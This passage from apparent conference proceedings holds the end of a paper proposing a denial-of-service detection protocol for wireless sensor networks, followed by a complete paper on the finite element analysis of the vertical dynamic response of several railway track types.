transmit it to the computer system. Actuators allow the computer system to act on the physical world by changing its state. Of these two components, our work aims to improve the proper functioning of wireless sensors [1, 2]. Advances in microelectronics over the past decades, along with developments in wireless communication technologies, have made it possible to produce extremely small sensors at low cost. These devices can communicate via radio waves and cooperate with each other to form a Wireless Sensor Network (WSN). A wireless sensor network is made up of a large number of nodes, which collect environmental data and transmit it, through multi-hop routing, to one or more collection points, in an autonomous manner [3]. This research area provides cost-effective and easy-to-deploy solutions for remote monitoring and data processing in complex and distributed environments. These networks are of particular interest for military, environmental, home automation, medical and critical infrastructure monitoring applications, which generally require a high degree of security. A wireless sensor network shares some similarities with typical computer networks, but also has its own unique requirements due to its characteristics (lack of infrastructure, energy constraints, very limited computing and storage capacities, dynamic topology, large number of sensors, limited physical security, etc.). Energy consumption and security remain challenges for the research community because of their paramount importance in ensuring good network performance. In the current work, we focus on communication security issues in sensor networks, more specifically data routing security, in order to find approaches for protection against attacks targeting WSNs. For this reason, we propose a method of detecting and reacting to denial of service attacks. This approach is applied to the LEACH-EDE (Leach-Equitable Distribution Energy) routing protocol treated in [4, 8].

2 Related Works
2.1 Protocol LEACH-EDE
Definition. To reduce the tasks of the cluster-head, we proposed a new routing concept (the EDE protocol), based on the Leach protocol [5], which consists in creating a node that is only responsible for data transfer. The cluster-head delegates the task of transmitting packets to the base station to another node of the cluster, called the Transfer Node (TN) (Fig. 1). The EDE protocol runs in two phases, as in the Leach protocol. In the set-up phase, we add the selection of the TN node: in a given cluster, the energy capacity of the chosen Transfer Node must be greater than or equal to the energy of the cluster-head; otherwise, the cluster-head itself plays the role of the TN. In addition, the difference in the steady-state phase is the data transmission from the CH to the TN [4].
Performance. We ran simulations with a varying number of sensor nodes, distributed randomly over an area of 100 m × 100 m. The simulations run under Matlab. We compare our EDE protocol with the Leach protocol [8]. We consider that all nodes have equal initial energy and that each dead node is excluded from the next round (Table 1).
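The TN selection rule can be sketched as follows in Python; this is an illustrative reading of the rule above (in particular the fallback when no member node has enough energy), not the authors' Matlab code.

```python
# Illustrative sketch of Transfer Node (TN) selection in a cluster (assumed
# reading of the LEACH-EDE rule; not the authors' Matlab implementation).
from dataclasses import dataclass

@dataclass
class Node:
    node_id: int
    energy: float  # residual energy in joules

def select_transfer_node(cluster_head: Node, members: list[Node]) -> Node:
    """Pick a member whose residual energy is >= the cluster-head's energy;
    fall back to the cluster-head itself if no such member exists."""
    candidates = [n for n in members if n.energy >= cluster_head.energy]
    if not candidates:
        return cluster_head                         # CH keeps the transfer role
    return max(candidates, key=lambda n: n.energy)  # most energetic candidate
```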


Table 1. Parameters table.

Parameters | Value
Initial energy of nodes | 0.2 J
Transmitter and receiver energy | 50 nJ/bit
Aggregation energy | 5 nJ/bit
Data packet length | 4000 bit
Amplifier energy Efs | 10 pJ/bit/m²
Amplifier energy Eamp | 0.0003 pJ/bit/m⁴
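The parameters in Table 1 correspond to the first-order radio energy model commonly used with LEACH-type protocols; the sketch below shows how the per-packet transmission and reception energies would be computed with these values. The distance threshold d0 and the model itself are standard assumptions of that literature rather than details spelled out in this paper.

```python
# First-order radio model typically used in LEACH simulations (an assumption
# here, instantiated with the values of Table 1).
import math

E_ELEC = 50e-9       # transmitter/receiver electronics energy, J/bit
E_FS   = 10e-12      # free-space amplifier energy, J/bit/m^2
E_AMP  = 0.0003e-12  # multipath amplifier energy, J/bit/m^4
E_DA   = 5e-9        # data aggregation energy, J/bit
PACKET = 4000        # packet length, bits
D0 = math.sqrt(E_FS / E_AMP)  # crossover distance between the two models

def tx_energy(bits: int, d: float) -> float:
    """Energy to transmit `bits` over distance d (free-space or multipath)."""
    if d < D0:
        return E_ELEC * bits + E_FS * bits * d ** 2
    return E_ELEC * bits + E_AMP * bits * d ** 4

def rx_energy(bits: int) -> float:
    """Energy to receive `bits`."""
    return E_ELEC * bits

# Example: one 4000-bit packet sent over 50 m, received and aggregated by the CH.
spent = tx_energy(PACKET, 50) + rx_energy(PACKET) + E_DA * PACKET
```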

Fig. 1. (a) Leach protocol where blue circles represent the member nodes, the black circles represent the cluster heads and the red dots represent the dead nodes, and for (b) EDE protocol where blue circles represent the member nodes, the red circles represent the cluster head, the green circles represent the transfer nodes and the red dots represent the dead nodes.

Figure 1(a) clearly shows that the lower part of the Leach protocol network presents a black area where all the sensors are dead. Thus, we may not have information from that area, which is no longer covered by sensors. The network in Fig. 1(b), processed by the EDE protocol, shows that the dead nodes are distributed throughout the network; in other words, there is no black zone. Therefore, we can collect data over the entire surface of the network.
2.2 Denial of Service Attack
The security of IT systems is unusual in that it cuts across virtually every other area of IT: to secure an entire system, every layer and every technology used must be secure. Thus, network security in itself constitutes a whole field of study, which in turn breaks down into several issues.


Possible Attacks (Denial of Service). A so-called denial of service attack in a computer network is an attack carried out with the aim of harming the normal functioning of this network. There are many ways to do this, and as a result there is a plethora of existing denial of service attacks. The state of the art in this field has two points of view: that of the attacker and that of the defender. It is essential to define the attack model in order to propose adequate countermeasures; and, more or less reciprocally, the protection mechanisms put in place over time push attackers to develop new attacks to bypass them. The most common attacks are [6, 10]:
• Radio interference, particularly at the physical level, to neutralize communications.
• Certain routing attacks, in particular sinkhole-type attacks, to penalize communications but also, and above all, for the parasitic collection of data.
• Battery depletion attacks or the physical destruction of sensors, to put the network out of service permanently.
• Corruption of data sent to the operator, to provide him with erroneous results and influence his decision-making.
Detection Methods. Once the network is deployed and the intrusion detection system is in place, the nodes responsible for monitoring the network analyze the surrounding traffic and draw inferences about the condition of the network. These deductions are the result of applying precise algorithms to the data. These algorithms are of several kinds and can be grouped into detection methods based on anomalies, on attack signatures, or on non-compliance with predefined specifications [7].

3 Approach
3.1 Problematic
Wireless sensor networks introduce their share of problems: alongside severe resource constraints, there is the question of security, whose implementation is an absolute necessity for medical or military applications, for example. While the authentication and encryption mechanisms in most computer systems use resource-intensive cryptographic protocols, these mechanisms have had to be adapted to the world of sensors. But there are other aspects to security, and network availability, depending on the context, can be just as essential. In summary, the problem arises as follows: how to prevent, or failing that, how to detect and then circumvent, while saving sensor resources, a malicious action aimed at taking the network out of service.
3.2 Proposed System (LTMN Protocol)
The main idea of our proposal is to guarantee effective security while ensuring maximum network lifespan. To this end, we have improved the protocol already proposed in [4]: a monitoring functionality has been assigned to the transfer node (TN), which is now responsible for both monitoring and data transfer. It is named the Transfer and


Monitoring Node (TMN), which gives rise to the Leach with Transfer and Monitoring Node protocol, the "LTMN protocol" (Fig. 2). The tasks of the TMN are the following (a sketch of this rule is given after Fig. 2):
• If a TMN finds that a sensor violates the rules set, for example by sending, during a unit of time, more data to its CH than a determined threshold value, it considers that the node behaved abnormally.
• Each TMN that has detected a compromised node sends a warning message to its CH.


Fig. 2. Cluster managed by the transfer and monitoring node
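To make the monitoring rule above concrete, the following Python sketch counts, per monitoring window, the packets each member node sends to the cluster-head and flags any node that exceeds a threshold; the window length, threshold value, and warning format are illustrative assumptions, not values fixed by the protocol.

```python
# Illustrative TMN monitoring rule (threshold and window are assumptions).
from collections import Counter

class TMNMonitor:
    def __init__(self, threshold_packets: int = 20):
        self.threshold = threshold_packets   # max packets per node per window
        self.counts = Counter()

    def observe(self, sender_id: int) -> None:
        """Called for every packet the TMN overhears in its cluster."""
        self.counts[sender_id] += 1

    def end_of_window(self) -> list[dict]:
        """Return warning messages for the CH, then reset the counters."""
        warnings = [{"type": "warning", "suspect": node, "packets": n}
                    for node, n in self.counts.items() if n > self.threshold]
        self.counts.clear()
        return warnings
```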

4 Conclusion
In the public, industrial, military and private sectors alike, the desire to collect and then analyze data on the environment, on processes and on flows continues to grow. Driven by constant progress in the miniaturization of electronic components and in the design of ever more efficient batteries, and made accessible by the standardization of protocols and the use of inexpensive equipment in their manufacture, wireless sensor networks constitute an ideal technical solution to meet these needs. Security is a rather complex issue, as WSNs are deployed not only on battlefields but also for surveillance, building monitoring, burglar alarms, and in critical systems such as airports and hospitals. Confidentiality is required in sensor networks to protect the information flowing between sensor nodes or between sensors and the base station; otherwise, the communication can be eavesdropped on. The different types of threats in sensor networks include spoofing and modification of routing information, passive information collection, node subversion, sinkhole attacks, sybil attacks, denial of service attacks and interference [9, 10].


In this paper, we propose a protocol based on the classic Leach protocol and its variant, the Leach-EDE protocol, in order to detect denial of service attacks while saving or evenly distributing the energy consumption of the sensors to extend the operating time of the network. In future work, the aim is to assess this proposal and to develop in more detail the role of the TMNs, so that the wireless sensor network can be properly secured.

References
1. Roxin, I., Bouchereau, A.: Ecosystème de l'Internet des Objets. In: Bouhaï, N., Saleh, I. (dir.) Internet des objets: Evolutions et Innovations. ISTE Editions, Londres (2017)
2. Thebault, P.: La conception à l'ère de l'Internet des Objets: modèles et principes pour le design de produits aux fonctions augmentées par des applications. Thesis, ParisTech (2013)
3. Doumi, A.: La Sécurité des Communications dans les Réseaux de Capteurs sans Fils. Doctoral thesis, Faculty of Mathematics and Informatics, Department of Informatics (2018)
4. Rayri, Y., Aroussi, H.K., Mouloudi, A.: Energy management in WSNs. In: Ezziyyani, M. (ed.) AI2SD 2019. LNNS, vol. 92, pp. 127–136. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-33103-0_13
5. Clare, L.P., Pottie, G.J., Agre, J.R.: Self-organizing distributed sensor networks. In: Proceedings of SPIE 3713, Unattended Ground Sensor Technologies and Applications, pp. 229–237 (1999). https://doi.org/10.1117/12.357138
6. Rathod, V., Mehta, M.: Security in wireless sensor network: a survey. Ganpat Univ. J. Eng. Technol. 1(1), 35–44 (2011)
7. Butun, I., Morgera, S.D., Sankar, R.: A survey of intrusion detection systems in wireless sensor networks. IEEE Commun. Surv. Tutor. 16(1), 266–282 (2013)
8. Fu, C., Jiang, Z., Wei, W., Wei, A.: An energy balanced algorithm of LEACH protocol in WSN. IJCSI Int. J. Comput. Sci. Issues 10(1), 354–359 (2013)
9. García-Hernández, C.F., Ibarguengoytia-Gonzalez, P.H., García-Hernández, J., Pérez-Díaz, J.A.: Wireless sensor networks and applications: a survey. IJCSNS Int. J. Comput. Sci. Netw. Secur. 7(3), 264–273 (2007)
10. Buch, D., Jinwala, D.: Denial of service attacks in wireless sensor networks. In: International Conference on Current Trends in Technology, 'Nuicone – 2010', pp. 1–8 (2010)

Numerical Investigation into the Vertical Dynamic Behavior of Railway Tracks Rhylane Hajar1(B) , Zougari Ayoub2 , Ben Abdellah Abdellatif2 , and Ajdour Mounia1 1 Mechanics and Civil Engineering Laboratory, Faculty of Sciences and Techniques of Tangier

(FSTT), Abdelmalek Essaadi University, Tetouan, Morocco [email protected], [email protected] 2 Laboratory of Engineering, Innovation, and Management of Industrial Systems, Faculty of Sciences and Techniques of Tangier (FSTT), Abdelmalek Essaadi University, Tetouan, Morocco

Abstract. Although the dynamic behavior of straight sections of railway tracks has been studied analytically, numerically and experimentally over the last decades by several researchers, this subject remains of current interest. In this paper, the authors present a more comprehensive numerical study analyzing the dynamic response, in the frequency domain, of a conventional ballasted track with mono-block sleepers and of three different types of non-ballasted railway tracks, while taking into account the actual profile of the rail. The latter has rarely been considered in previous studies and has generally been simplified into a rectangular section or an I-profile. The study is conducted using the finite element analysis software ANSYS, and the numerical results are compared with those obtained in a previous study to ensure their accuracy. The effect of some parameters of the Direct Fixation Fastener (DFF) track type on the frequency response is also discussed, namely the fastener spacing and the stiffness of the fasteners. The results show that the frequency response of the DFF track is very sensitive to the variation of these parameters, particularly to the variation of the fastener spacing. Keywords: Railway tracks · Dynamic response · Frequency domain · Finite element analysis · Numerical results · Frequency response

1 Introduction
Railway transport remains an adequate alternative for significantly relieving road transport and for supporting the transport of passengers and goods between two stations, thanks to its advantages such as large transport capacity, high speed, energy efficiency, environmental protection, safety and punctuality. It is also one of the main factors in urban development. With the recent technical advancements and improvements in railway transport, which allow increased train operational speed, axle loads and traffic density, the dynamic interactions between the train and the track have seriously worsened, resulting in environmental issues and service performance


deterioration of both vehicle components and railway track structures. The need to identify the cause of problems arising from the train-track dynamic interactions and to develop solutions to those problems has stimulated studies and research on train-track dynamic behavior [1]. In the literature, the dynamic behavior of straight sections of railway tracks has been widely investigated experimentally, analytically, and numerically. Experimentally, Mosayebi [2] examined the dynamic behavior of railway track sections with concrete and wooden sleepers using a field test. Using a full-scale test rig, Wang [3] investigated the dynamic performance of different types of non-ballasted track systems. Using a hammer test, Esmaeili [4] studied the dynamic behavior of a ballasted track comprising ballast mixed with tire-derived aggregate. Sysyn [5] used a field test to analyze the dynamic behavior of a ballasted railway track containing sleeper voids. Analytically, Grassie [6] studied the vertical dynamic response of a ballasted track subjected to high-frequency excitation. Knothe [7] analyzed the vertical dynamic behavior of the ballasted track, taking into account the effect of the subgrade at low frequencies. Wu [8] investigated the dynamic behavior of the ballasted track at higher frequencies while considering the rail cross-sectional deformations. The influence of slab length on the vibration isolation performance of floating-slab track was investigated by Li [9]. Mazilu [10] analyzed the dynamic response of slab track with continuous slabs subjected to a moving harmonic load. The dynamic performance of the most commonly used urban railway tracks was studied by Otero [11], who found that the floating slab track is the best of all the track types considered. Numerically, Liu [12] analyzed the effect of a rail equipped with a constrained damped dynamic vibration absorber on slab track vibration reduction. Shahraki [13] studied the dynamic behavior of various types of transition zones between ballasted and non-ballasted track under the passage of high-speed trains. Zougari [14] analyzed the dynamic behavior of a ballasted track and three types of non-ballasted railway tracks. Although the dynamic behavior of straight sections of railway lines has been widely studied in the last decades, this topic remains relevant. In the present study, the dynamic response of different ballasted and non-ballasted railway tracks is investigated numerically in the frequency domain using the finite element analysis program ANSYS Workbench (WB), a module of ANSYS 19. The real profile of the rail is considered in this study; the latter has generally been simplified into a rectangular section or an I-profile in the majority of previous studies. The numerical results are then compared with those obtained in a previous study [14] to ensure their validity. The effect of some parameters of the Direct Fixation Fastener track type on the dynamic response is also examined, and the findings could support the dynamic design of non-ballasted railway tracks by providing important information on the track's fundamental dynamics in the vertical direction.

2 Numerical Study on the Railway Tracks Dynamic Response The dynamic response of railway track structures to a dynamic load is obtained numerically using the finite element analysis program ANSYS Workbench, module of ANSYS 19, by solving the general system of equations of motion of dimension N, where N is


the number of degrees of freedom, and which is expressed as follows [15]:

$M \ddot{u}_n(t) + C \dot{u}_n(t) + K u_n(t) = F(t)$   (1)

where $M$ is the inertia matrix, $C$ is the viscous damping matrix, $K$ is the stiffness matrix, $\ddot{u}_n$, $\dot{u}_n$ and $u_n$ are respectively the acceleration, velocity and displacement vectors associated with the nodal coordinates, and finally $F$ is the time-dependent vector of external forces. In the numerical study presented here, four railway track types are analyzed: the conventional ballasted track with concrete mono-block sleepers, and three types of non-ballasted tracks: the Direct Fixation Fastener (DFF) track, the Bi-block track and the STEDEF track. A brief description of the studied track types is given in [15]. The different railway tracks considered are represented in ANSYS Workbench as illustrated in Figs. 1, 2, 3 and 4. The Direct Fixation Fastener (DFF) track and the Bi-block track are shown in Fig. 1 and Fig. 2, respectively. Since there is no interaction between the rails through the infrastructure, only a half-track is evaluated for both track types [14, 15]. Figure 3 and Fig. 4 display the conventional ballasted track with concrete mono-block sleepers and the STEDEF track, respectively. For both types of track, the whole track is considered in order to take into account the flexibility of the sleepers.

Fig. 1. The representation of the Direct Fixation Fastener (DFF) track type in ANSYS Workbench

Several ANSYS library elements are used to define the components of the various railway track types studied in this paper, and it is important to mention that the frequency range considered in this research runs from 10 to 400 Hz. This range includes the characteristic frequency range of vibrations produced by wheel-rail contact [14], and it should be taken into account when selecting the type and size of the elements to use. The elements used in the description of the railway tracks considered in this paper are defined as follows: in all cases, the rails are described using straight Timoshenko beam elements BEAM188. The size of the beam element corresponds to the actual distance between the track supports. The real profile of the UIC54 rail is used in this numerical study, based on the profile dimensions indexed in [15]. The sketch of the actual rail profile is created using Design Modeler and then assigned to the beam elements.


Fig. 2. The representation of the Bi-block track type in ANSYS Workbench

Fig. 3. The representation of the conventional ballasted track type with concrete mono-block sleepers in ANSYS Workbench

The sleepers and the blocks, as in the case of the rails, are also described by straight Timoshenko beam elements BEAM188, and the length of the elements is chosen to enable the distributed ballast or the rubber pads under the blocks to be represented accurately. A rectangular profile is attributed to the beam elements describing the sleepers and the blocks. In comparison to the mass of the whole track system, the fastening system mass is negligible. Hence, the fastenings are reduced to a longitudinal massless spring element named COMBIN14, while the ballast in a ballasted track and the rubber pads under the blocks in a Bi-block and STEDEF track are described using a distribution of longitudinal


massless spring element COMBIN14. The lift of the sleepers over the ballast is not taken into account in the present study since the tensile supporting stiffness is not neglected. For the track components which are described using beam elements, density, Young’s modulus, and Poisson’s ratio of the material are introduced. The stiffness value is attributed to the elastic elements that represent the fastenings, the rubber pads under the blocks, and the ballast. The dissipative capacity of the railway track components is represented by a hysteresis or a structural damping, which is incorporated into ANSYS Workbench through the structural damping loss factor.

Fig. 4. The representation of the STEDEF track type in ANSYS Workbench

After defining the type of elements and the physical and material properties of the track components, the boundary conditions should be defined adequately, since this represents the most important phase of the dynamic problem definition process, upon which the dynamic response of the railway track system directly depends. The railway track is composed of the superstructure and the infrastructure; in the present study only the superstructure is considered, while the infrastructure supporting the track is assumed to be rigid, hence all the nodes of the rail bottom are fixed. Only vertical excitation is considered in the study presented here, and the nodal degrees of freedom in the different track types analyzed are all constrained to allow only vertical motion of the track elements and transverse bending of the beam elements. This is because the wheel-rail contact force is mainly vertical on the straight sections of a railway track, and the vertical vibrations are the most important [14]. The track length selected is sufficient to produce boundary conditions that are similar to those of an infinitely long railway track when a force is applied at the midpoint of the railway track. Dynamic problems can be solved in the time domain or the frequency domain. The aim of this paper is to characterize the dynamic response of the different railway tracks


in the frequency domain; therefore, the analysis type selected is the ANSYS harmonic analysis, and vertical harmonic loads with variable frequency are considered. It should be noted that in the case of hysteresis or structural damping, and always for harmonic solutions of the equation system (1), the viscous damping matrix disappears and a stiffness matrix with complex components is introduced [14]. Different methods are available in ANSYS for solving the equations representing the system. In this study, the Full method is selected. This method considers all degrees of freedom of the system and solves the general dynamic equation at any time. It is the easiest method but also the most time-consuming; however, this is not a serious problem, as the number of nodes is not very high. The results of the integration process are expressed in the frequency domain. In the following section, the frequency responses of the various track types generated numerically in the present study are compared to those obtained in an earlier study [14, 15]. The Ansys Parametric Design Language, a module of ANSYS 13, was employed in this earlier numerical analysis, and only a simplified rectangular profile of the rail UIC54 was considered. The dimensions of the simplified profile were chosen to maintain the properties of the original rail. The calculated frequency response was compared to experimental and analytical results and found to be in good agreement. The real and simplified rail profiles utilized in this paper and in the previous study are illustrated in Fig. 5a and Fig. 5b, respectively.

Fig. 5. The profile of the rail UIC54. a The real profile. b The simplified profile

For instance, Fig. 6 shows the representation of the STEDEF track type in Ansys Parametric Design Language as considered in the previous study. It can be seen clearly that the rail profile considered is a rectangle.

3 Validation of the Calculation Results
In an attempt to examine the accuracy and validity of the numerical calculation results produced in this paper, the frequency response of the railway track is compared in this section with that obtained in a previous numerical analysis given in [14]. The comparison is made for the various types of railway tracks considered, by means of the


Fig. 6. The representation of the STEDEF track type in Ansys Parametric Design Language [14, 15]

rail vertical receptance, which expresses the vertical displacement of the rail, $y_r$, at a certain location as a function of the harmonic vertical force, $F$, applied at the same or a different location, for all frequencies $f$ in the range of interest. The vertical receptance of the railway track is described by the following expression [15]:

$R(f, x) = \dfrac{y_r(f, x)}{F}, \quad F(f) = F e^{j 2\pi f t}; \quad y_r(f) = y_r\, e^{j(2\pi f t + \varphi)}$   (2)

where $y_r$ represents the amplitude of the vertical displacement of the rail, $F$ represents the amplitude of the vertical harmonic force applied to the rail, and $\varphi$ is the phase of the receptance. In this comparison, the harmonic exciting force is applied at the midpoint of the railway track, directly above a track support (sleeper or fastener), and the rail vertical receptance is estimated, for all the track types considered, at the point of the vertical excitation force. Figures 7, 8, 9 and 10 illustrate the rail vertical receptance determined for all railway track types considered in this numerical study, as well as those available in the literature [14, 15], based on the railway track parameters presented in Tables 1, 2, 3, 4 and 5. These figures show that the DFF track type has only one resonance in the frequency range studied, while two resonances are detected in the case of the traditional ballasted track with concrete mono-block sleepers, the STEDEF, and the Bi-block track types. The absence of sleepers in the DFF track type explains this disparity. The presence of sleepers causes the second resonance peak, which is associated with the out-of-phase vibration mode, in which the rail and sleepers vibrate in opposite directions. The first resonance is attributed to the in-phase vibration mode, in which the rail and sleepers (if present) serve as mass, while the ballast in the ballasted track, the rubber pads in the Bi-block or STEDEF track, and the fastening system in the DFF track act as a spring. Figure 7 compares the rail vertical receptance calculated in the present study and that provided in [14] for the case of the Direct Fixation Fastener (DFF) track type, whose properties are listed in Table 2. It shows that the in-phase mode occurs at the same frequency, 118 Hz, but the amplitude is slightly different.
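To make the in-phase/out-of-phase picture concrete, the short Python sketch below computes the receptance of a lumped two-degree-of-freedom model of one track support (rail mass on a rail pad, sleeper mass on the ballast), with structural damping represented as a complex stiffness. This simplified model is not the paper's finite element model and only roughly reproduces the resonance frequencies reported here; the lumped masses per support are assumptions derived from the values in Tables 1 and 4.

```python
# Lumped two-DOF receptance sketch (an approximation, not the ANSYS model).
import numpy as np

# Assumed lumped values for one 0.6 m support of the ballasted track
# (derived from Tables 1 and 4; the lumping itself is an assumption):
m_rail    = 54.4 * 0.6            # rail mass over one span, kg
m_sleeper = 324.0 / 2             # half sleeper mass (half-track), kg
k_pad     = 115.2e6 * (1 + 0.2j)  # rail pad as complex (structural-damping) stiffness
k_ballast = 27.48e6 * (1 + 0.2j)  # ballast under the half sleeper

M = np.diag([m_rail, m_sleeper])
K = np.array([[k_pad, -k_pad],
              [-k_pad, k_pad + k_ballast]])

freqs = np.arange(1, 501)         # Hz, same range as the receptance plots
receptance = []
for f in freqs:
    w = 2 * np.pi * f
    # Harmonic response: (K - w^2 M) u = F, with a unit force on the rail DOF.
    u = np.linalg.solve(K - (w ** 2) * M, np.array([1.0, 0.0]))
    receptance.append(abs(u[0]))  # |rail displacement| per unit force, m/N

peak_freq = freqs[int(np.argmax(receptance))]  # frequency of the dominant peak
```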


Table 1. Properties of the rail UIC54 [14]

Parameter description | Value
Mass of rail per unit length | 54.4 kg/m
Density | 7850 kg/m³
Modulus of elasticity | 210 GPa
Poisson's ratio | 0.3
Rail cross-sectional area | 6.93 × 10⁻³ m²
Rail second moment of inertia | 2.35 × 10⁻⁵ m⁴
Loss factor of the rail | 0.02
Rail gauge | 1.435 m
Spacing of track supports | 0.6 m


Fig. 7. The rail vertical receptance for the Direct Fixation Fastener (DFF) track type

Table 2. Properties of the Direct Fixation Fastener (DFF) track [14]

Parameter description | Value
Stiffness of the fasteners | 19.5 MN/m
Loss factor of the fasteners | 0.4

The same comparison is illustrated in Fig. 8 but for the case of Bi-block track type. The railway track properties considered are shown in Table 3. For this track type, the


in-phase mode occurs at the same frequency, around 59 Hz, but the amplitude is not the same. The amplitude and frequency of the out-of-phase mode found in [14] are different from those obtained in the present study.


Fig. 8. The rail vertical receptance for the Bi-block track type

Table 3. Properties of the Bi-block track [14]

Parameter description | Value
Rail pad stiffness | 115.2 MN/m
Rail pad loss factor | 0.2
Stiffness under block | 17.58 MN/m
Loss factor under block | 0.2
Mass of one concrete block | 94.8 kg
Length of one concrete block | 0.72 m

Figure 9 corresponds to the same comparison in the case of the conventional ballasted track. The railway track parameters used are represented in the Table 4. The comparison shows that the in-phase mode occurs at the same frequency 42 Hz but the amplitude is not equal. The amplitude observed in [14] is slightly lower than the one reported in the present study. The frequency and amplitude of the out-of-phase mode found by the authors in [14] are higher than those produced in this paper. The comparison of rail vertical receptance generated in the case of the STEDEF track type can be seen in Fig. 10. Based on the railway track properties listed in Table 5,


Fig. 9. The rail vertical receptance for the conventional ballasted track type with concrete monoblock sleepers

Table 4. Properties of the conventional ballasted track with concrete mono-block sleepers [14]

Parameter description | Value
Length of sleepers | 2.56 m
Mass of sleepers | 324 kg
Density of concrete | 1759 kg/m³
Modulus of elasticity of sleepers | 27.6 GPa
Poisson's ratio of sleepers | 0.175
Sleepers cross-sectional area | 72 × 10⁻³ m²
Sleepers second moment of area | 34.6 × 10⁻⁵ m⁴
Loss factor of sleepers | 0.1
Rail pad stiffness | 115.2 MN/m
Rail pad loss factor | 0.2
Ballast stiffness | 27.48 MN/m
Loss factor of ballast | 0.2

the in-phase mode is observed at the same frequency of 58 Hz, but the amplitude is not identical. The out-of-phase mode found in [14] has a lower frequency and amplitude than the one detected in this numerical study. In fact, the differences in frequency responses calculated for the STEDEF track type are not entirely related to the use of a different rail cross section geometry. The true


Fig. 10. The rail vertical receptance for the STEDEF track type

Table 5. Properties of the STEDEF track [14]

Parameter description | Value
Rail pad stiffness | 115.2 MN/m
Rail pad loss factor | 0.2
Stiffness under block | 17.58 MN/m
Loss factor under block | 0.2

cause of the disparities has yet to be identified, but because they are negligible over the frequency range of 0 to 600 Hz, the result of the comparison can be interpreted as a validation of the calculation results. Consequently, the approach presented in this paper is reliable and can characterize the dynamic behavior of the railway track in a more realistic way, taking into account the real profile of the rail. This approach can also be useful for analyzing many aspects of the dynamic behavior of railway tracks, for example the effect of certain track parameters on the dynamic behavior, and the results could help in the design of a track. An example is presented in the next section, where the authors use this approach to analyze the effect of some parameters of the non-ballasted track on its dynamic behavior.

4 The Dynamic Properties of the Non-ballasted Railway Track In this section, the Direct Fixation Fastener (DFF) track type is selected to research the dynamic properties of the non-ballasted railway tracks. By varying the fastener


spacing and the stiffness of the fasteners, the influence of the fastener parameters on the frequency response of the DFF track is examined. Since the effect of the fastening system on the vertical track dynamics is more clearly observed in the on-support configuration, the excitation of the rail between fasteners is not simulated. The rail vertical receptance of the DFF track is calculated for different fastener spacings (L = 0.3, 0.6, 0.8, 1.2 and 1.5 m) and fastener stiffness values, as shown in Fig. 11 and Fig. 12, respectively.

Fig. 11. The influence of the fasteners spacing on the frequency response of the DFF track

The impact of varying the fastener spacing on the DFF track's vertical receptance is shown in Fig. 11. As the fastener spacing increases, the amplitude of the vertical receptance at the first peak increases, and its frequency decreases gradually. For fastener spacings larger than 0.6 m, an anti-resonance or dip related to the first pinned-pinned mode appears clearly; this is the 'elastic sleeper support' effect. As the fastener spacing increases, the frequency of the pinned-pinned mode decreases and its amplitude rises. This mode is one of the most probable modes of vibration for a beam resting on equally spaced supports: at this frequency, the vertical bending wavelength equals twice the span. The response at the first pinned-pinned frequency mainly depends on the excitation location; it is lowest above the support, causing an anti-resonance or dip, and highest at mid-span, generating a peak. Figure 12 illustrates the vertical receptance of the DFF track as the stiffness of the fasteners changes. This graph shows one peak, which corresponds to the in-phase mode. As the fastener stiffness increases, the amplitude at the first peak becomes smaller and its frequency rises. However, the pinned-pinned resonance does not appear clearly in this calculation, because the fastener spacing is kept unaltered at 0.6 m. These results could aid in the design of a non-ballasted railway track and in the selection of the fastener type to be used, and thus improve the dynamic behavior of railway tracks.
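As a rough cross-check of the pinned-pinned behavior, the Euler–Bernoulli estimate of the first pinned-pinned frequency for a beam on rigid supports spaced L apart can be evaluated with the UIC54 properties of Table 1. This closed-form estimate is an assumption added here for illustration: it neglects shear deformation and support elasticity, so the values it gives are only indicative and higher than what a Timoshenko-beam track model would predict.

```python
# Illustrative Euler-Bernoulli estimate of the first pinned-pinned frequency
# (an added cross-check, not a result from the paper).
import math

E = 210e9    # Young's modulus of the rail, Pa (Table 1)
I = 2.35e-5  # second moment of inertia, m^4 (Table 1)
m = 54.4     # rail mass per unit length, kg/m (Table 1)

def pinned_pinned_frequency(span: float) -> float:
    """First bending mode of a beam simply supported over one span, in Hz."""
    return (math.pi / (2.0 * span ** 2)) * math.sqrt(E * I / m)

for L in (0.3, 0.6, 0.8, 1.2, 1.5):
    print(f"L = {L:.1f} m -> f_pp ~ {pinned_pinned_frequency(L):.0f} Hz")
# For L = 0.6 m this gives roughly 1.3 kHz; the trend (frequency dropping as
# the spacing grows) matches the behaviour described for Fig. 11.
```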


(In Fig. 12, the fastener stiffness takes the values k = 4.875, 9.75, 19.5, 29.25 and 58.5 MN/m.)

Fig. 12. The influence of the fasteners stiffness on the frequency response of the DFF track

5 Conclusion
A detailed numerical study of the frequency response of a traditional ballasted railway track with concrete mono-block sleepers and of three types of non-ballasted tracks has been presented in this paper. The study was carried out with ANSYS Workbench, a finite element program included with ANSYS 19, and takes into account the actual rail profile, which has generally been simplified into a rectangular profile or an I-profile in most previous studies. The comparison of the numerical results obtained in this study with those generated previously reveals good agreement over the frequency range considered. The results used in the comparison were generated in a previous work using the Ansys Parametric Design Language, a module of ANSYS 13, and were validated by comparing them to experimental measurements and analytical results. The effect of varying some of the fastener parameters on the frequency response of a non-ballasted track has also been discussed in the present paper, namely the fastener spacing and the fastener stiffness. It is shown that the fastener spacing and stiffness have a major impact on the frequency response of the non-ballasted track:
• As the fastener spacing gets larger, the amplitude of the in-phase mode increases and its frequency decreases slightly.
• The pinned-pinned mode appears clearly for fastener spacings greater than 0.6 m; its frequency drops and its amplitude rises as the fastener spacing becomes larger. Thus, the fastener spacing affects the vertical response of non-ballasted tracks when it is larger than about 0.6 m.
• The amplitude of the in-phase mode becomes smaller and its frequency rises as the fastener stiffness increases.


In the future, this numerical study will be extended to account for the complex geometry of a curved section of a railway track in order to investigate the dynamic behavior of curved railway tracks.

References
1. Zhai, W.: Vehicle-Track Coupled Dynamics: Theory and Applications. Springer, Singapore (2020)
2. Mosayebi, S.-A., Zakeri, J.-A., Esmaeili, M.: Field test investigation and numerical analysis of ballasted track under moving locomotive. J. Mech. Sci. Technol. 30(3), 1065–1069 (2016). https://doi.org/10.1007/s12206-016-0209-3
3. Wang, M., Cai, C., Zhu, S., Zhai, W.: Experimental study on dynamic performance of typical nonballasted track systems using a full-scale test rig. Proc. Inst. Mech. Eng. Part F: J. Rail Rapid Transit. 231, 470–481 (2017). https://doi.org/10.1177/0954409716634751
